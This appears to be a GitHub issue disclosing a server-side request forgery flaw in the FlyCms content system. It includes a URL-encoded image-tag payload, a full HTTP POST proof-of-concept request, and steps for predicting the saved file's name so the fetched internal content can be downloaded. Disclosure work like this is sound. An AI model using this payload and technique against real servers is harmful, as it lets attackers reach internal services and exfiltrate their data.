FlyCms icon indicating copy to clipboard operation
FlyCms copied to clipboard

Published 20 hours ago verified publisher icon sunkaifei

There is a SSRF vulnerability

Open m4yfly opened this issue 6 years ago • 0 comments
trafficstars

An issue was discovered in FlyCms. There is a security vulnerability in file /Users/bang/code/java/FlyCms-master/src/main/java/com/flycms/module/question/service/ImagesService.java, in saveUrlAs() function, result in a SSRF . SSRF ­ Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet.

POC

%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3E

Send the request is as follows:

POST /ucenter/question/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/question/add
Content-Length: 93
Cookie: CFID=3; CFTOKEN=50139797; ECS[visit_times]=1; bgC_sid=P5rfbe; JSESSIONID=node01jp6c3qjsftrz1xa81ovh47bff0.node0; Hm_lvt_2f24154b3f87697d36a4e2a638b68aaa=1560325064; Hm_lpvt_2f24154b3f87697d36a4e2a638b68aaa=1560328852; FlyCmsId=593f391df8a70cab630e34efa645c590
Connection: close

title=ssrf10&content=%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3E&tags=ssrf7&price=0

image We can see that it will call replaceContent to fetch remote image when add a question.

image In funtion replaceContent,we can use 127.1 bypass reg or request other url directly,and saveUrlAs is called here.

image Finally HttpURLConnection result in SSRF.

image Still in replaceContent, we can find the file path, file name.The addQuesion finally failed, but file will create. File path is the date tody, example /upload/content/2019/6/12/ File name is concat md5(date + filenum) + filenum + extension image md5 16 result is 8-24 of md5_32 resulst. image And we can get server time from response, after convert timezone, we can caculate the result. image so filename is 43EC4555543DEFC6_0.,absolute path is /upload/content/2019/6/12/43EC4555543DEFC6_0.

Request the path we can download file named 43EC4555543DEFC6_0.. image It's SSRF result.

m4yfly avatar Jun 12 '19 09:06 m4yfly